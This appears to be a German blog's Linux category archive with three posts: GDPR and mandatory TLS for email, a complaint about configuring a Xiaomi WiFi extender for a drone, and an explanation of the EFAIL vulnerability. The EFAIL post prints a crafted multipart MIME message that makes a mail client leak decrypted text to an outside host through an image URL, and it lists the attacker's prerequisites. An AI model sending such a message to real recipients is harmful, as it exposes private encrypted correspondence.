Category Archives: Linux

DS GVO: Email Transportverschlüsselung wird Pflicht sein

Posted on by

Willkommen im Chaos des Datenschutzes. Ich hatte ja schon lange den Verdacht, daß EMails auch nur noch mit TLS übertragen werden dürfen, wenn man zum Datenschutz verpflichtet ist. Dabei habe ich mich aber immer gewundert, wieso das nie in der Presse steht. Jetzt wird sich das hoffentlich hektisch ändern.

Die Meinungen zur TLS Verschlüsselung von Emails

Wie uns Rechtsanwalt Schwartmann auf seiner Webseite wissen läßt, ist ab Freitag aufgrund der Datenschutz Grundverordnung wahrscheinlich eine TLS Verschlüsselung für eingehende und ausgehende Emails Pflicht, sofern man ein Unternehmen betreibt oder aus anderen Gründen zum Datenschutz verpflichtet ist.

Nach Ansicht des Landesbeauftragten für Datenschutz und Informationsfreiheit Nordrhein-Westfalen ist eine Transportverschlüsselung auf jeden Fall erforderlich:
Bezüglich der sicheren Implementierung der Transportebene hat das Bundesamt für Sicherheit in der Informationstechnologie die Technische Richtlinie „BSI TR-03108-1: Secure E-Mail Transport“ herausgegeben.
Unter datenschutzrechtlichen Gesichtspunkten ist diese Richtlinie als Stand der Technik zu betrachten, so dass ihre Umsetzung eine notwendige Voraussetzung für die datenschutzkonforme E-Mail-Kommunikation ist.

Quelle: https://www.rechtsanwalt-schwartmann.de/verschluesselungspflicht/
„(Ende Zitat)

Die Bundesbeauftragte für den Datenschutz und die Informationsfreiheit hat uns heute morgen endlich wissen lassen, daß nur der Einsatz von TLS 1.2 in Frage kommt:

„Inwieweit ein Provider, der die Infrastruktur zur Verfügung stellt, eine Option anbieten muss, die ausschließlich den Empfang von TLS 1.2 transportverschlüsselten E-Mails zulässt, beurteilt sich nach dem gegenwärtigen Stand der Technik.

Der gegenwärtige Stand der Technik ist, daß TLS 1.2 seit 2008 das Maß der Dinge ist. Der Nachfolger TLS 1.3 wird aber bald kommen, da die Planung des Standards kürzlich beendet wurde. Das hält aber gerade den BUND, wo die Information her ist, nicht davon ab, auch heute noch mit TLS 1.0 zu senden 😀 (Böser Dienstleister vom Bundmailserver 😉 )

IMHO

Ich schließe mich dieser Meinung an, da auch ich die DS GVO so interpretiere, daß alle Kommunikationskanäle verschlüsselt sein müssen. Wie einfach das gehen kann, zeigt folgende Anleitung :

Zunächst mal wählen wir im Account unter „Mailserver“ die „EMail-Options“ aus:

Nun aktivieren wir die beiden obersten Punkte:

„Verbindung zum Server benötigt Verschlüsselung“ und „Empfangener Mailserver muß TLS benutzen“

Das war es dann auch schon, jetzt kommen nur noch TLS gesicherte EMails an den Mailserver ran. Damit entspricht das Mailserververhalten dem geltenden Datenschutzrecht.

Wer es ganz genau nehmen will, der müßte auch noch DANE implementieren, da dies in einer BSI Richtlinie zum Thema gefordert wird. Da DANE aber AFAIK noch nicht 100% ausgereift ist, könnte der Teil schwierig werden, was nicht heißt, das einige Provider dies nicht schon implementiert hätten.

Bei Exim ist grade eine passende Diskussion gestartet worden.

Quellenlinks:

https://www.ldi.nrw.de/mainmenu_Aktuelles/Inhalt/Technische-Anforderungen-an-technische-und-organisatorische-Massnahmen-beim-E-Mail-Versand/Technische-Anforderungen-an-technische-und-organisatorische-Massnahmen-beim-E-Mail-Versand.html

https://www.rechtsanwalt-schwartmann.de/verschluesselungspflicht/

https://www.bsi.bund.de/DE/Publikationen/TechnischeRichtlinien/tr03108/index_htm.html

Xiaomi Mi WIFI Extender 2

Posted on by

Oh .. wo fangen wir bei der Sache am besten an ? Vielleicht der Historie folgen .. na.. ah.. ok, ist wohl das beste.

Das war letzte Woche …

„Zssszzzzzzzzzzzs…“ machte die Tello über mir, aber mein Handy sagte „Nein. Hier fliegt keine Tello rum.“ Öh. Der Überkopfflug meiner neusten Anschaffung machte ein Verbindungsabbruch je zu nichte. Die Drohne hing in 10m über dem Abflugrasen fest in der Lust. Vermutlich würde sie von alleine runterkommen, wenn der Strom zu Neige ginge. Der Akku der Ryze DJI Tello hält aber locker 12 Minuten durch. Was machen ?

Der dezente Hinweis, man möge doch einfach näher an die Drohne ran gehen, konnte mich nicht begeistern. Vor zwei Jahren hatte ich mal ganz übel eine nicht vorhandene Stufe betreten wollen und die anschließende Luftnummer war gar nicht angenehm gewesen. 10m bis zur Drohne rauf ? Keine Chance zu Fuß.  Dronatello stand dagegen wie eine Eins in der Luft und wollte dort offenkundig nicht so schnell weg.

Ein beherztes „Hände hoch, Du bist umzingelt“, samt Handy versteht sich, brachte eine Verkürzung auf 8m Luftlinie und damit einen Reconnect des WLANs, über das die Tello Drohne gesteuert wird. Damit konnte die Drohne dann wieder überredet werden näher zu kommen. Faszinierend an der Sache ist, daß die Drohne horizontal 150m weit kommen kann ( ohne andere WLANs die stören ) aber nach 10m Steigflug hart vom Radar verschwindet.

Eine physikalische Erklärung  als erfahrener Funkamateur, der mit selbstgebauten Antennen bis zum Mittelmeer gekommen ist, kann ich dazu nicht abgeben. Das 2.4 GHZ WLAN der Drohne ist nicht gerichtet, also müßte es ohne zu murren 10m senkrecht reichen. Das Handy scheidet auch aus,  denn die Antenne kann man nach Belieben drehen, also auch kein Faktor. Es könnte höchstens sein, daß die Elektronik so blöde im Boden der Drohne angebracht ist, daß diese das WLAN Signal 90 Grad nach unten abschirmt.  Das bisschen Plastikgehäuse, daß die Motoren am Platz hält, scheidet als Störfaktor jedenfalls aus 🙂

Jetzt kann die Tello nur 10m hoch fliegen, weil die Firmware das als Hardlimit drin hat, aber die 150m theoretischen Meter sind jetzt auch nicht der Brüller, zumal die Liveübertragung der Kamera zum Handy stark entfernungsabhängig ist und einfach öfter bei 50m aussetzt. (Ja, bei den vielen WLANs hier, kein Wunder.)  Was tun ?

Na gut, Schritt 0 war die Drohne zu hacken und die 10m Begrenzung zu entfernen, aber darum solls nicht gehen 😀

Xiaomi Mi WIFI Extender 2

Ein Video auf Youtube später hatte ich einen Xiaomi Mi WIFI Extender 2 für rund 13 € bestellt. Das hätte ich mal lieber nicht getan. Was mich das Teil an Nerven gekostet hat, wo es doch „nur“ mal das WLAN der Drohne erweitern sollte, könnt Ihr kaum glauben. Heute war es soweit, der DHL Mitarbeiter unseres Vertrauens brachte das „gute“ Stück.

Ausgepackt & Eingesteckt waren eine Bewegung. Mist, der USB Port ist nicht breit genug.. anderen Port nehmen.

Schritt 1 – Konfigurieren

Ok, der ist an. Jetzt Konfigurieren, aber wie ?  Verbinden wir uns doch mal in das neue WLAN, da wird man schon einen Webdienst haben, der das erledigt und uns auch gleich noch das neue WLAN konfigurieren läßt.

Ja, sooooooo einfach hätte es sein können. War es aber nicht 🙁

Schritt 2 – Handy App installieren

Der  Connect ins WLAN war zwar möglich, aber außer einem TELNET Port ohne Zugangsdaten, war NICHTS da.  Also mußte eine HANDY App her, die ALLE und noch ein paar MEHR Android Rechte einforderte! Wirklich ALLE! Wenn ich ALLE sage, meine ich auch ALLE, sogar welche, die es offiziell gar nicht gibt!

Wer mein Blog liest, der weiß, daß ich das nicht zulassen würde. Habe ich auch nicht. Dafür gibt es APPGUARD von SRT. Man installiert erstmal die fragliche App, dann sagt man AppGuard, daß die APP überwachen soll, der baut die neuzusammen, löscht das Original und installiert die geänderte App wieder ins System. Dann kann man die Rechte des Programms so downgraden wie man es für nötig hält.

In meinem Fall war das „Alles – ( WLAN & GPS )“ . Nun startete die App zwar, aber das Handy hing durch, was den Installationsprozess der Sache mal locker auf 10 Minuten verlängert hat, pro Versuch versteht sich 😉

Schritt 3 – App starten

Natürlich wollte diese chinesische Spionage App, deren Name hier nicht genannt werden soll, nicht einfach den Router suchen, nönö, die wollten auch noch das drittgeborene Kind, die Seele meiner Frau und alles was die Datenschutzbestimmung der EU explizit verbietet, also einen Cloud-Login. Ächts.. Na gut, Fake Adresse erzeugt, Weiterleitung auf echte Email angelegt, registriert. Lustigerweise wollte nie jemand wissen, wem der Account denn gehört. In China reicht wohl eine Nummer, oder dieser mysteriöse Telnetport auf dem Device aus.

Schritt 4 – Router suchen

und suchen und suchen und wenn ich nicht gestorben bin, sucht die App noch heute..

Was war der Fehler ? Die App hatte gefragt, wo ich bin, also sagte ich Europa. Ich hätte CHINA sagen sollen, denn Mikrosekunden nach der Umstellung auf die Location China Mainland, war der Extender gefunden 😀

Schritt 5 – Konfigurieren

Ja, das war dann die nächste Pleite. Der Extender wurde zwar gefunden, ich konnte dem auch noch sagen, welches Netz er klonen soll, aber das wars dann auch schon. Der Klonkrieg wurde nie erfolgreich beendet.

4 Stunden sind seit dem DHL Paketabwurf vergangen, Hürden wurden gemeistert, Apprechte gebrochen, Privatssphären sind für immer im Digitalen Dickicht verschütt gegangen, aber der Repeater repeatete nicht. Oder doch?

Ma guggen.. Hey, da ist ja son komisches neues Netz das .. TELLO_PLUS .. ob das … vielleicht.. Drohne an, App an, altes Tello Netz gelöscht, neues Tello Netz verbunden.. Scheisse.. ein BILD!! ich habe ein BILD.. und weg 😀  WTF.. Dronatello hatte sich abgeschaltet, dem wars zu blöd geworden, wie affig lange der Extender braucht um zu connecten.

3 Versuche später, ohne LAPTOP, das zu Debuggzwecken und Telnethacks mitlief, gings dann irgendwann doch.

Fazit

TUT ES EUCH NICHT AN. Nehmt ein Laptop, benutzt das als REPEATER, das hält auch länger und spioniert Euch nicht aus! ganz ehrlich, die 13 € war das NICHT WERT!

Ob es das 10m Problem löst, weiß ich bis heute noch nicht 😀

EFail: Die Katze ist aus dem Sack

Posted on by

Die Katze ist aus dem Sack, das Whitepaper zur EFAIL Schwachstelle ist bekannt. Als Entwickler auch von komplexen Programmen zum Parsen von (auch abgedrehten) Formaten, kann ich Euch sagen, daß es genug Scheisse da draußen gibt, die man fehlertolerant behandeln kann, aber die EFAIL Schwachstelle ist genau das : EIN MEGAFAIL!

Selbstgemachtes GPG Schwachstellen Logo 🙂

EFail – Der MEGAFAIL

Der Exploit basiert darauf, daß man eine verschlüsselte Email an den Empfänger A abgefangen hat, diese aber nicht dekodieren kann. Das bleibt auch nach der Lücke so! Also PGP/GPG sind an sich fein raus, die haben gar keine Schuld an der Sache.

Nun bettet man den verschlüsselten Block der Mail in eine Multipart-Mime Message, die aus zwei HTML und einem Cipherblock (dem verschlüsselten Mailteil) besteht. Das könnte so aussehen:

From: <unverdächtig@kenneich.de>
To: <opfer@opfer.de>
Content-Type: multipart/mixed;boundary="GRENZE"

--GRENZE
Content-Type: text/html;charset=ascii

<html><body><img src="https://efail.de/
--GRENZE
Content-Type: application/pkcs7-mine;smine-type=enveloped-data
Content-Transfer-Encoding: base64

hQIMA+PS/5obaKVzARAAuG0PvUFHEzRp+U9HAm1GgjnUwy6afP60q0QYl9vWby5h
ysIVpoXrHZqn3H8f/+FjsoZ2YpDlCqhvKzn/UaP8kxb21YN1+eSaMi55b6WFyIif
hbxnp2Z155YM6Sx+VrTa55DQEF2c7LzyFKcE1csRiB0py+bWJKFPERRhXxSVOMpv
sZB3oLcZmBS990RgjbGUUZhXClxubwwqXo3K41Wj8kktQvZ7YD6hMz46V26kN4Ru
PLt1PQ/+P0iznlNjXaIckLXUq/RNpRMC5469Dp674OECZ2kc3fFrv5zkZcs0Kg5r
...
--GRENZE
Content-Type: text/html;charset=ascii

"></body></html>
--GRENZE--

Was jetzt passiert ist, daß der Mimeparser des Emailprogramms, den verschlüsselten Block vom PGP Plugin dekodieren läßt und nahtlos in das umgebende HTML einfügt. Es kommt dann eine URL raus wie => „https://efail.de/TEXT+DER+NACHRICHT+AN+DEN+EMPFÄNGER“, welche als Bild in dem HTML eingebettet ist, was die meisten Mailprogramme dazu bringt, diese sofort zu rendern. Also schickt der Client damit eine Bildanfrage und überträgt so die dekodierte Nachricht.

Voraussetzungen

1. Man braucht eine verschlüsselte Email an den Empfänger
2. Man braucht einen Webserver, der mehr als 512 Zeichen in der URL annimmt ( selbstschreiben vermutlich)
3. Man braucht ein Emailprogramm beim Opfer, dessen Parser von einem Irren geschrieben wurde
UND 4. das ungefragt Bilder von externen unbekannten Webseiten nachlädt.

1+2 kann der Angreifer liefern, 3+4 muß das Opfer beisteuern.

Der Pressetenor

Der allgemeine Pressetenor war heute, daß die Plugins einen Bug haben. Wenn aber obiges so zutrifft, dann haben die Plugins keinen BUG, sie sind nur zwingend notwendig, daß der Angriff automatisch ablaufen kann. Schaltet man die aus, läuft der Angriff ins Leere.

Was in einigen Webseiten aber abgeleitet wurde war, daß die Verschlüsselung geknackt wurde und das trotz monatelanger Vorwarnung, die Emailprogramme keinen Schutz dagegen gefunden haben.

Das aber ist LÄCHERLICH.

Hier wird wiedermal eine Sau durchs Dorf getrieben, die es nicht verdient hat. Ja, das Ganze ist ein Bug. Ja, der ist in der Wirkung echt schlimm. Nein, die Verschlüsselung wurde nicht geknackt, die wurde nur vom Emailprogramm automatisch aufgehoben und exfiltriert und genau da liegt der Hund begraben. Wie kann man nur einen Parser bauen, der die drei Teile einer Email, die als DREI Teile in der Email vorliegen, zu einem Teil zusammen fassen? Das ist die Frage.

Die, die den Parser geschrieben haben, der die drei Teile verbindet, die sollten ihre Studiengebühren zurück bekommen, sofern sie welche gezahlt haben!

Schlimmer ist nur noch, daß mindestens drei unterschiedliche Teams den gleichen Fehler gemacht haben.

Updates

Thunderbird wird erst mit einer Version 52.8 nicht mehr verwundbar sein. Ich nehme mal an, die Version kommt jetzt etwas zügiger raus, als geplant.